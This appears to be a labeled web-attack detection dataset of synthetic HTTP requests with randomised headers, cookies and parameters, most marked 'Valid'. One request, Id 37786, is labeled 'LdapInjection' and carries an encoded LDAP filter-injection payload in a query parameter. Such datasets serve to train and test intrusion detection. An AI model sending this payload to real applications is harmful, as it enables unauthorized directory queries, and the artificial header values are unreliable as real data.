If-Modified-Since: Fri, 06 Mar 09 20:41:23 UTC
If-Unmodified-Since: Sun, 26 Jul 09 15:19:41 UTC
If-Match: "qQM5.iAMVdUAVYH"
If-None-Match: "jP1eI1J_BjX73WNH9Bc"
If-Range: Mon, 23 Mar 09 10:22:30 CET
Max-Forwards: 88
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic RHJpZGJ5YTk6OFhpdHJlYg==
Authorization: Digest username="ftot1o"
Range: 822099-090,811-0
Referer: /via8n/ixgot/nsaie5tt/balcsEjn/gnnmtwrh.html
TE: chunked;q=0.8,gzip;q=0.8
Trailer: TE
User-Agent: Mozilla/5.9 (compatible; MSIE 3.9; Linux i586; awwndmojla; nstSeIktuj; mslTeuku)
UA-CPU: PowerPC
UA-Disp: 743,400,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0585x0395
Via: ilibtc/8.5 www.tm2oOoy.jpeg
Transfer-Encoding: gzip
Upgrade: l2sonl/9.3, rwue/0.0
Warning: 436 135.104.177.87:1264 "dhiTIi5ayllgdbbitob" 
X-Forwarded-For: 138.202.93.19
X-Serial-Number: 961731
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20885
Start - Id: 34675
class: Valid
POST /uc@8IK_group byqXL/3dkw6p/mroole/YYu/nHUr3aJCmSLST26U/4olteu5ltUrniesgfeip/eBOakjwL--Tm/nqAwmg.htm? HTTP/1.1
Content-Length: 283
Content-Language: j9,gomsEo1,Qny
Content-Encoding: identity
Content-Location: http://tesl.st/dttmsii/leqienfe/esaiuvb.jpeg
Content-MD5: dnV0dHJkNW1hbWtpbm1lSA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Mar 10 14:57:52 UTC
Last-Modified: Thu, 26 Feb 09 18:41:11 CET
Host: 104.164.94.240
Connection: close
Accept: image/gif;q=0.4
Accept-Charset: iso-8859-9;q=0.8, ks_c_5601-1987;q=0.3
Accept-Encoding: 
Accept-Language: Gte3hsg-ssim;q=0.8, a4hir-eTueut;q=0.9, ltas-ene;q=0.0, T0teshs-m8it
Cache-Control: min-fresh=1012
Client-ip: 170.32.182.161
Cookie: Cifi=74;aIeeh=eUNDD;-styleMP0fNhttps7k=/tps0;isl3jytuhgM4iOl=open=li6stdcfee9;h7leeyw4naa=o1R;poit1eirisrLySe=f5tu<sxie
Cookie2: $Version="009"
Date: Mon, 23 Jan 06 12:23:56 GMT
ETag: "p4qYJhv8vIwEdsiuRA"
Expect: 100-continue
From: lmeur@Eanea.ch
If-Modified-Since: Sat, 11 Sep 04 22:56:50 CET
If-Unmodified-Since: Mon, 26 Mar 07 06:17:47 UTC
If-Match: "1W8ZME_1q1IcD93btk"
If-None-Match: "dTVBKM1UHIsfmhVXBY@6"
If-Range: Sat, 25 Sep 04 04:13:39 CET
Max-Forwards: 4763
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=vehg
Authorization: NTLM RzJ0d2NkcnByMHR1VjByYm9tU3JudW9lYWVlckN0ZTVnbGZT
Range: -08
Referer: /o1tdnep/jrpl4dd8.php3
TE: gzip;q=0.9,trailers
Trailer: Connection
User-Agent: uBJUI8v http://www.csc7dbc.org
UA-CPU: MIPS
UA-Disp: 081,3578,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0894x8053
Via: HTTP/0.1 110.201.186.105:35, 1.7 39.44.56.191, 2.7 www.sAineaaf.jpeg
Transfer-Encoding: deflate
Upgrade: nq8o/9.4, hsea/1.7
Warning: 912 www.vEtlJzei.png "hmbt4d6C" "Tue, 20 Sep 05 24:39:51 GMT"
X-Forwarded-For: 180.150.65.176
X-Serial-Number: 80315
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

zseAklchcDy=25&sZeyno=g&rih1rbimgtr meta\ru&aNtosaf8i=17&wqantso=meta&oodeleteteaar&Frtd1tp2tt= &BCdsyRI2tdt4d=882764&IBECXn=ayaaotasqoc&dreclca=71&ldol=-fetmp4&Ifipedseysde8F=9ndscunasa9k&dSl9=xwN1kyhMWj&6oseonicoa=zsve7gnkbatmprgen&hcyhf=v&cohIE8tMgi=ntwinnt&5cis6n=a_poYF_Ey

End - Id: 34675
Start - Id: 19610
class: Valid
GET /ysNJ/idfridae/oQWGlTBZzL.8Uqf7klwr/Q_4O.mdb?J9y6vVO5opt=k&SGMBi=til&6qEonm=tr%28%7C&ckrSBC-2delete4xml=ntTLKbKmH.&hcwLeJ.KCJz=+moa&rxW9_=e4A6ooel HTTP/1.0
Host: www.spnmue.it:8931
Connection: keep-alive
Accept: video/quicktime;q=0.9, text/plain
Accept-Charset: x-mac-turkish;q=0.0
Accept-Encoding: 
Accept-Language: tste-juv1;q=0.2
Cache-Control: max-stale=21
Client-ip: 147.175.11.94
Cookie: nngh=bDeyK4VXcRRl;oWsqkuh=ot ;padsRooejZo=@rv;syvori2ys==im'
Cookie2: $Version="32"
Date: Sun, 30 Dec 07 12:57:02 UTC
ETag: W/"cXnqhfvLlyq5X8-kHkn"
Expect: rteasasb
From: widc@tloe.fr
If-Modified-Since: Mon, 11 Aug 08 15:47:28 CET
If-Unmodified-Since: Sat, 07 Jul 07 09:34:10 CET
If-Match: "CEd8SbSI6EDf5ZvPT5E5"
If-None-Match: *
If-Range: "WLGI5oAmeYCPL-h8"
Max-Forwards: 95
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: hnwc eonohrme=eToyi
Authorization: Digest nc=D95398ba
Range: -4,298-
Referer: http://www.atvrwea.be/mecahl3/trh6w.wmn
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.5 (Windows; U; Win98 0.5; jc-na; rv:2.9.6) Gecko/20210841
UA-CPU: x86
UA-Disp: 119,8274,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2031x847
Via: 5.6 www.O5nyj.css, 9.5 www.Biu1dnb.htm
Transfer-Encoding: gzip
Upgrade: emf/6.5
Warning: 605 www.dnne.shtml "oI3esi8tekNt" 
X-Forwarded-For: 154.58.1.25
X-Serial-Number: 35644174748471115443
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19610
Start - Id: 32088
class: Valid
GET /aRxvei.oHqr.qe7OV-l/feifp/nnaejldaoltegxd/mti.jsp?Xadaeoim=e1pvC&dez=6078344&tp4=d%40_DEqwmx&7iyo2=jneoebybaan&B.4yIPM5m0SK=30&ne=nUnfVDw HTTP/1.1
Host: www.oIns.de:122
Connection: nottai
Accept: video/*;q=0.4, text/xml
Accept-Charset: x-mac-arabic;q=0.4, euc-kr;q=0.5, iso-8859-9;q=0.5, utf-7, iso-8859-1
Accept-Encoding: deflate;q=0.9, deflate, deflate, deflate, compress
Accept-Language: ulrcfdT-e, o-tG0e, ohea-nRoiIm, 7o0ho5-tttc;q=0.5, ipn-e;q=0.1
Cache-Control: max-stale
Client-ip: 33.67.116.69
Cookie: ursjhr=218;ohw5fi6ge=7@2iw;EdeleteiiHE=5etusru;osMhchhabiepsii=604961;@documentgroup bycopyQA=c8e;1ou8gAsehasmflS=liR1ETmtgN-D
Cookie2: $Version="24"
Date: Tue, 22 May 07 11:58:54 CET
ETag: W/"5PV8Py1fLbmc@v.6Mq9o"
Expect: 100-continue
From: tetisto@d9naat.be
If-Modified-Since: Wed, 04 Jun 08 19:32:48 UTC
If-Unmodified-Since: Sat, 03 Sep 05 07:02:33 GMT
If-Match: "Ypo8_okI1B1.PcmLFQ"
If-None-Match: "HeL9IN2CJwzKyjf3"
If-Range: Wed, 08 Jun 05 11:53:43 GMT
Max-Forwards: 6842
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNvbHRybzphRk9p
Authorization: Basic cmE3Yzp5YW9kbA==
Range: 409-001,9959-4327,17574-972
Referer: http://www.neA4b.uk/echf/diohrnu/ise3rwE.mdb
TE: trailers
Trailer: From
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 5.7; ea-Pn; rv:4.8.8) Gecko/21291805
UA-CPU: MIPS
UA-Disp: 702,413,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 367x7496
Via: 1.2 www.8nes.html:7271, 5.9 www.twe2oAit.shtml
Transfer-Encoding: compress
Upgrade: 7esxrt/2.4, oead/7.0, rsiaa/4.4, rte8e/6.3
Warning: 016 25.68.94.166 "waqtcrQansteysdLb" "Mon, 16 Feb 09 09:37:11 CET"
X-Forwarded-For: 15.97.140.41
X-Serial-Number: 34758865476448808371
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32088
Start - Id: 22634
class: Valid
GET /t4F0fJjBWWdBodT/8bRW20dKmprocessing-instruction878/Vk_N9Pl/ovaDgs9SbXo4u_nBm/nfhankn.shtml?3bnreoYoc8ilfde=ee6id765ghGCdlhDc&btasnen=e82t%40n8&j5hCmrme4=9096652676&zhpAafTkE=egsaKQ4P&jtdsifa91oiKnal=120&USxmlJJY0pqor=tte6rsc&our=spk+&aeSeatn=%3ClhRolatohttpsbhLchildv&iivkt0m5ea=child-&are7t=ekRINgx5NMu&fyafq=e+&ivtoAtd0elie=sceshutdownf&tmeamTgxyi=aihGlE5yl&wtsEs3cwudO=oittdrsEsyAveen HTTP/1.1
Host: 175.231.119.85
Connection: 8dDe6y
Accept: */*
Accept-Charset: koi8-r, iso-2022-jp;q=0.2, iso-2022-jp
Accept-Encoding: 
Accept-Language: sxTss-nejdcad, nbcTa-ellplne8
Cache-Control: no-transform
Client-ip: 68.152.34.49
Cookie: ogyl7remneovm=e;itril~;FiT-ClCDLhbm=092075;K8lod3=ehEabetweennS$@fjdivtelnet;qf7=33074;mea=w=e;inj=elnioobb4nbpg5o
Cookie2: $Version="4"
Date: Wed, 28 Sep 05 24:47:42 UTC
ETag: "jot8xJwmgVNxWAsPY-WS"
Expect: 100-continue
From: dsezsSj@hnssHk.cz
If-Modified-Since: Wed, 24 Nov 04 23:46:15 GMT
If-Unmodified-Since: Fri, 20 Jul 07 22:04:37 UTC
If-Match: "2EhRYL33.H88SrI"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="3Fcmat"
Authorization: shre dbfrU=9I2No
Range: -43745
Referer: http://eihenD3.com/rtle/dnyzyDae/t6rooOf.php4
TE: trailers,deflate;q=0.2,gzip
Trailer: Warning
User-Agent: Mozilla/0.4 (compatible; qtbkR3li; Windows NT; sefszouso)
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 353x5479
Via: 4.4 www.hiqh.shtml
Transfer-Encoding: gzip
Upgrade: bdtoka/5.6, oh6n/9.8, oq9ry/4.2, eic/9.3
Warning: 281 www.inNer.css "4tJ3dtF" "Sun, 01 Nov 09 07:54:39 CET"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 705834569346
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22634
Start - Id: 22063
class: Valid
GET /sTouoloBotp1ie/eaQU5TRsegFqfy-WRuR.gif?Eogrh8=ttivc+a+i&sYMXo4=sp&sao6eJrn1rt=7&Q@4Vxmlbw=ihade&e1ghae1n=erm%24e7Gs%24e&h4tok=hgKR HTTP/1.0
Host: www.eW8l6.de
Connection: wpcrbuE
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: sjwsratV-oin;q=0.8, 6kpe-aeietw
Cache-Control: no-store
Client-ip: 62.126.220.31
Cookie: saNawighrsa=520;aschcnSilsroonl=9118939069;3GadmingWB=6;unBtYt=n-gPFpNvc
Cookie2: $Version="0"
Date: Tue, 03 May 05 21:43:58 GMT
ETag: W/"kPLtVKQiUiN1u_DtD8s"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Mon, 21 Apr 08 10:11:26 GMT
If-Unmodified-Since: Tue, 07 Jul 09 24:41:23 CET
If-Match: "cNLLVmUJbiu9CTD80S"
If-None-Match: *
If-Range: Sat, 16 Jul 05 15:53:30 GMT
Max-Forwards: 375
MIME-Version: 0.3
Pragma: 1ht='cgepieno'
Proxy-Authorization: bVsst cmoe=heeoree0
Authorization: Basic d29JNjpyMDgz
Range: -774
Referer: http://www.isnpo.fr/omdm/tcig/99sc/0hovton.php3
TE: gzip;q=0.1
Trailer: TE
User-Agent: Mozilla/8.3 (X11; U; Linux i586 2.1; iO-ea; rv:7.2.6) Gecko/06230350
UA-CPU: x86
UA-Disp: 077,354,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4071x1172
Via: 3.9 15.205.109.189:5, nsarch/8.3 111.89.171.112
Transfer-Encoding: Aneow; rtr0Atr=1repeaus
Upgrade: ewHj/5.7
Warning: 377 253.201.21.135 "5jiuaat" "Mon, 24 Dec 07 17:02:15 GMT"
X-Forwarded-For: 30.171.197.154
X-Serial-Number: 10148622161169
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22063
Start - Id: 11136
class: Valid
GET /ntgtlpsN1e4eeao/ehI/a@mgwAU7XTp@GKi/5nigntmugoa5wc4o/xt/r_FO1perlCFLV-bacH/UeidY3gSnbawgetye/igc_HpgBoo/giyoyltutobuleh/r@9RoHDxxt8zBZ6SpMb/slj0ZblLTlXBhQa93D.asmx?33a=yrugm&EeNUsTa4i=69282&ta=275&nrrly=9&nyn=nLeNYh7M4&jTdmNh3re=1oec&errsetNjx=832654&srslrff=477878&Koon=3454900581&1s0ihGwo5r=048&es1hhnRdre2=7%28mritvlbDh9Oen&eudrfd=wn&hRe=wje6JE0G2i HTTP/1.0
Host: www.Aedubojptf.de:80
Connection: Nltea8
Accept: audio/basic;q=0.3, text/xml;q=0.8
Accept-Charset: isiri-3342
Accept-Encoding: *
Accept-Language: miacn-rn8euctn, l-snnAsro;q=0.8
Cache-Control: no-transform
Client-ip: 38.111.5.129
Cookie: bfaieodnwEu1ol=lht;uosmaFfdie=070873791
Cookie2: $Version="517"
Date: Sat, 16 May 09 14:46:53 UTC
ETag: W/"4E6Sz89.qjbnVEhPx_"
Expect: 100-continue
From: lQbqTa@Erdtpio.net
If-Modified-Since: Wed, 27 Feb 08 14:51:02 GMT
If-Unmodified-Since: Wed, 14 Dec 05 06:57:45 UTC
If-Match: "pKLlfiYTT0YXSIxW"
If-None-Match: "Tnb2tBeENbkJR0OjrTI"
If-Range: Wed, 30 Jan 08 23:06:29 GMT
Max-Forwards: 9521
MIME-Version: 9.1
Pragma: mrrm='a0'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: NTLM RWlqblNSc25haGxxbmZ1aU5kZWE5dHRyeHNzeGVlbmt0cA==
Range: -71,-21606
Referer: /nebtpIm/dw1h1/2f9ooim.zip
TE: deflate,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 7.5; ts-ae; rv:3.6.7) Gecko/69870580
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 571x624
Via: 1.9 www.xftaejte.tiff, FTP/5.0 www.thu0aR.gif
Transfer-Encoding: identity
Upgrade: hgrW/3.1
Warning: 864 51.124.226.139:114 "jlvcgsocjhnvs" 
X-Forwarded-For: 100.194.169.169
X-Serial-Number: 06776910679420292948
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11136
Start - Id: 16604
class: Valid
GET /snlii/6ieinrbCseorEpiec/4rpt/r.K5G/lhk8yeawRe/oWMwhI/ndfekLSOfnLXRTXZb/n6NsoCqXjMVFfW-jK/enLtKqHyxujr723KLQ.htm?annlhhnVwniie=a%2FItrsti+rsto%29%40e&arsegltjcemie=miMt1eyo6a HTTP/1.1
Host: www.ldlp.biz
Connection: keep-alive
Accept: application/*;q=0.3, application/*
Accept-Charset: iso-2022-kr;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 115.162.152.91
Cookie: Adtqeufyed=thavingd;wtan3ltruic5we=:iuTio<;tbVJlocation7=n qerunionrfrmtbgsound;3c=e3Kh
Cookie2: $Version="6"
Date: Sat, 22 Nov 08 04:10:29 UTC
ETag: "dP@cVrOnf6RldbCGxPY"
Expect: lenu=baie;r4Re1
From: dwou@hguthnrf9e.org
If-Modified-Since: Fri, 18 Aug 06 01:53:32 UTC
If-Unmodified-Since: Thu, 08 May 08 22:25:12 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Aug 06 18:24:41 UTC
Max-Forwards: 3
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest qop=ensne
Authorization: Digest realm
Range: -508053,86460-25,-68
Referer: http://www.retm.gov/mmzjto/8yoce.cfm
TE: trailers,gzip;q=0.4
Trailer: Connection
User-Agent: Mozilla/3.8 (Machintosh; U; PPC Mac OS X 8.9; Es-et; rv:7.2.4) Gecko/32851264
UA-CPU: StrongARM
UA-Disp: 049,0120,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1536x5641
Via: FTP/2.8 www.Nirueo.png
Transfer-Encoding: deflate
Upgrade: Nca/5.9, s4h/1.3
Warning: 105 www.Ia3bwst.html "meseeoOE" 
X-Forwarded-For: 155.254.22.166
X-Serial-Number: 4070028617537255
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16604
Start - Id: 37786
class: LdapInjection
GET /i8syzZ0/pJKfFK.dll?eeieaRrsnip=195616&srnrrhoatrseqen=wLaeobjectl&fbnR=33%29%28%26%28objectClass%3Dsyee%29%28%7C%28sn++%3Dsaaa%29%28cn%3DDM++++J*%29%29 HTTP/1.1
Host: www.entoI.st
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 224.119.48.3
Cookie: aEii=or\[tar t;ooHthnno6a=t_fsrfZSKs;wtretzt=8gntbldoeasb3;Eq01yDV=9
Cookie2: $Version="03"
Date: Sun, 02 Sep 07 03:47:05 CET
ETag: W/"h6vB3KF92zhMxzvOX9n"
Expect: 100-continue
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Sun, 01 Oct 06 09:49:08 UTC
If-Unmodified-Since: Mon, 28 Jul 08 08:54:41 GMT
If-Match: "IeQr@ILlnr-Y.eTaVy"
If-None-Match: *
If-Range: Mon, 07 Jun 04 21:32:17 GMT
Max-Forwards: 348
MIME-Version: 1.4
Pragma: iteVh='f5'
Proxy-Authorization: RanlI8 hfn2me8l=cnlo
Authorization: Basic UmVhZXB5bDpzZG90aQ==
Range: 47-,41517-
Referer: /heoef/dnt2c/arToae/peM7ep/gteotiBe.msf
TE: gzip,trailers
Trailer: Expect
User-Agent: Mozilla/2.2 (Machintosh; U; PPC 5.6; ts-cw; rv:5.0.5) Gecko/40978273
UA-CPU: Sparc
UA-Disp: 3289,383,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 807x162
Via: 8.5 www.rnmkkap.htm, 5.1 55.252.82.30, 2.3 150.148.99.102
Transfer-Encoding: deflate
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 0381591746319527137
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37786
Start - Id: 12645
class: Valid
GET /jLlUx9z.jsp?sFip5ieah=ahsf&ne=n23F.wOqVT HTTP/1.0
Host: 95.137.120.95:80
Connection: Fbrml
Accept: image/jpeg;q=0.2, application/*, text/*
Accept-Charset: hz-gb-2312, iso-2022-kr, ks_c_5601-1987;q=0.2, hz-gb-2312;q=0.3, windows-1254
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 219.63.63.224
Cookie: ieirwpjlnnol3h=0Lp4@acseienn ;htnnoforta1laAy=ciaety638i
Cookie2: $Version="468"
Date: Sat, 16 May 09 11:19:56 CET
ETag: "tIJ9X1sr31@@Bqf-AK"
Expect: 100-continue
From: e9hfirse@Sgst2t.uk
If-Modified-Since: Wed, 23 Jul 08 14:12:11 CET
If-Unmodified-Since: Sun, 27 Jun 04 12:27:58 CET
If-Match: "0apqgXKrOXUyX4i"
If-None-Match: "aYnXxJVUZ1tZk4RV"
If-Range: Thu, 10 Mar 05 18:11:37 UTC
Max-Forwards: 609
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM czZpaW90N29vZE80aGlsd3RScElhRGZ2ZWlhM3M2Zk5kc0k4SWQ=
Authorization: Basic bWdtZWhsaTo5eWR4
Range: 351-,8925-
Referer: http://e54Ecmcn.it/so1gd.png
TE: trailers
Trailer: Range
User-Agent: E5bknohdi (eR-nGPyaZ; 9fR6zm)
UA-CPU: x86
UA-Disp: 470,937,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 961x7915
Via: HTTP/9.9 www.eilejiE.png, 0.6 198.240.57.61, FTP/8.7 208.244.153.227
Transfer-Encoding: compress
Upgrade: njK/4.3
Warning: 906 www.hkn2eu.gif "ileSeoToeetstiab" "Thu, 22 Jan 04 07:44:04 GMT"
X-Forwarded-For: 107.120.142.45
X-Serial-Number: 67342985693
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12645
Start - Id: 13588
class: Valid
GET /dSaj2obcpeQuxM7wQTY/i3btp/rjxSDKbU7Upvbr3eaa/cWD1/k4-Aj/tBT4hj0/7fKcJbMQ0j/sGFDq@ilvXxBDU4uKZ2K/fg/r2bFK.NawjV268jYbY_/openn4PnodeisystemEm.asmx?aeo8MnR2pbhfi=47&Rif0=b4iq7%3Ehsgr&egfdbl1tq=eefee51ac&KfJ-6Zja83=0hnfe&i_WBJHQe=464742&uFErr=srcl&UcvcoVk7=4491531&linkEzoXallac=k4J-UsU&nnuofuax=- HTTP/1.0
Host: www.eoooydtz.gov
Connection: keep-alive
Accept: image/jpeg;q=0.1, application/*;q=0.0, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: identity, compress;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 134.203.218.183
Cookie: weo=zt:ie[j7e oweo wzu;1aouktriO=3;eihgta68h=ctan;oO08tts=83353;tid=heeh1bUNL(doincludeo7location;h457=twls0a
Cookie2: $Version="5"
Date: Sat, 06 Dec 08 17:05:16 UTC
ETag: W/"lah1mwcGBsgDoEZ"
Expect: sp4siceo
From: issst@tutqrpd.biz
If-Modified-Since: Tue, 08 Jan 08 01:58:43 GMT
If-Unmodified-Since: Mon, 16 Feb 09 17:02:24 GMT
If-Match: *
If-None-Match: "XYt9r1aIgp.OL8PIsJ"
If-Range: Wed, 23 Apr 08 06:53:04 CET
Max-Forwards: 1
MIME-Version: 9.3
Pragma: rh='lei'
Proxy-Authorization: Basic dGl1b3R2Om9hZWVvaVMy
Authorization: Basic YmVlM3k6eFR4YQ==
Range: 0480-
Referer: http://slAcwlt.de/3bNti/nlndl/dede4rut/fmtue8ni/s5un.cfm
TE: chunked,chunked
Trailer: If-Match
User-Agent: hfdWntH http://www.8eesolb.gov
UA-CPU: MIPS
UA-Disp: 896,6607,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 138x4900
Via: FTP/5.3 www.Hu4k.tiff, 5sox/3.9 122.50.125.168:839
Transfer-Encoding: identity
Upgrade: tsoo4A/5.4, a7l/6.5
Warning: 703 178.118.249.8 "oetetNse5t" "Tue, 31 Jan 06 07:52:19 UTC"
X-Forwarded-For: 170.190.112.43
X-Serial-Number: 70032554284651
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 13588
Start - Id: 7463
class: Valid
POST /cttbeCas9zlgngP/th6kLebdaabhMtrR9o/akasne7ysrejee/ypdtlt7Qse22lo0/6xlyVw_6zK/toedqomfnorudrenn4.swf? HTTP/1.1
Content-Length: 164
Content-Language: lcy
Content-Encoding: identity
Content-Location: /NtEiente/aaaC.mpg
Content-MD5: aGMzbm9Uc2VkY29lM0J1QQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Apr 10 23:03:04 CET
Last-Modified: Tue, 13 Dec 05 09:00:30 UTC
Host: 88.229.62.96
Connection: keep-alive
Accept: audio/*
Accept-Charset: euc-tw;q=0.5, iso-8859-7, windows-1254;q=0.6, windows-1252, x-mac-icelandic
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: RtrH=en
Client-ip: 104.160.13.173
Cookie: ahs=seaotlib;uIltnTRnyre6e=uN6E-5JeXU
Cookie2: $Version="24"
Date: Thu, 26 Feb 09 17:42:24 GMT
ETag: "WGe7-zYKUlhh0kn@YUc3"
Expect: rZidtmh
From: simeoAtp@bzmstxmta.de
If-Modified-Since: Tue, 12 Dec 06 22:12:24 GMT
If-Unmodified-Since: Wed, 12 Oct 05 06:32:53 UTC
If-Match: "v1N_O.kUYo.FEcJ"
If-None-Match: *
If-Range: Sun, 03 Sep 06 14:08:16 UTC
Max-Forwards: 5970
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM dDFyZGhPbGkzSG5udWFPdG9zdGk5b2VxZmhkckVvZW5lZGll
Authorization: Basic bmR5b29qMTpvdHN5YWw=
Range: -471
Referer: http://1vuaU3.net/2z4oedb2/weeeU7vb/eti6eni.fgf
TE: trailers,deflate;q=0.1,trailers
Trailer: Max-Forwards
User-Agent: yr2ce2u7le6a4shn
UA-CPU: PowerPC
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 871x804
Via: 6.3 www.atdidest.js
Transfer-Encoding: deflate
Upgrade: omrin/0.6
Warning: 422 www.rinltnh.jpeg "aiAkn" 
X-Forwarded-For: 46.39.95.124
X-Serial-Number: 119603156999
----: -----------
~~~~~: ~~~~~~~~~~~~~

pv_oOTlink=816&ecshhnepr=icCi&hona0efEnoyshe=mc evnexecrrt3&mmMnxnelsntcee=947&cnivN=t7 r&_Oor0dh=aiinet&Z6divyd=4r0&-guYM=6578600&iDhKrK@=8&nl9teei=s1ai0rae7it7c5a

End - Id: 7463
Start - Id: 11271
class: Valid
GET /Bunion0ncevalSf2fPA1/rC0xC/oP8/3Ujf@tvdQ7PufKioCY/eTyvmHZTH/Slr7hlo/eJEDyQjSlLUZi/kFtaSzhtauu/Rwtcb8gos4s7so2heng/biOQ3DD/CJyfBwindow.openHA2U67KLi/77C.sh?EXEfuGCi-JEs=3 HTTP/1.1
Host: 128.74.184.207
Connection: 4dmdxr
Accept: application/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: 8Rio-brourten, tegiu-ieo
Cache-Control: no-cache
Client-ip: 153.188.24.187
Cookie: nCsweefw7Etn=4winnt6v
Cookie2: $Version="4"
Date: Wed, 17 Dec 08 11:06:37 GMT
ETag: W/"UeOVYm3VUi4MHjwB1SI"
Expect: e7exuse9
From: udeo@jot2xbpben.it
If-Modified-Since: Wed, 04 Mar 09 01:42:33 GMT
If-Unmodified-Since: Sat, 24 Sep 05 11:36:17 GMT
If-Match: "HzLBBU79gndDGA30G"
If-None-Match: *
If-Range: Thu, 12 Aug 04 22:26:26 UTC
Max-Forwards: 22
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.teoa6sdy.st/otmTgo/wT2rxzYn.png
Authorization: 7naecn d3riaeic=cesc
Range: 394051-208299
Referer: http://www.sarrs2.be/uhtdgtre/znr8.png
TE: gzip;q=0.6
Trailer: Pragma
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 7.2; eb-Ai; rv:9.1.4) Gecko/86723376
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 484x621
Via: HTTP/5.3 186.104.173.233:8157, 3.3 www.hemnecti.gif:161
Transfer-Encoding: identity
Upgrade: elh0/4.0, ejd/6.4, i1ej/0.9, inl/2.9
Warning: 337 216.50.53.199 "osavyeiduatyteha" "Tue, 27 Apr 04 05:08:34 GMT"
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 7492268797432274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11271
Start - Id: 32686
class: Valid
POST /lh/tmpd@5./xGzE/fwucetrqtsiwsun5/lezf1v/mqSt6/estwgeRnEtilbi/w7-l0zle0Dw/tmpRsock_stream/tSXwZnF/ghbLz.f@U6@VnsyGnkcQ.png? HTTP/1.0
Content-Length: 297
Content-Language: e,h2a,ocw
Content-Encoding: identity
Content-Location: /Aadla/yswd/hatm/tsbi.txt
Content-MD5: ZGVFdDhoZWx0M2hhc252ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Jun 05 09:39:24 GMT
Last-Modified: Thu, 03 May 07 11:57:30 CET
Host: 153.116.102.34
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.3, big5, euc-jp, windows-1255;q=0.6
Accept-Encoding: *
Accept-Language: ie-Cayt;q=0.2, ln-istr, awaaagN-s9s;q=0.4
Cache-Control: max-age=20
Client-ip: 223.216.236.48
Cookie: ktau=i-4hlinput=http opendmB ;hhwab3i1eo=tKzLgMOFxKkn;d9iSx=2098
Cookie2: $Version="68"
Date: Mon, 09 Nov 09 01:13:15 UTC
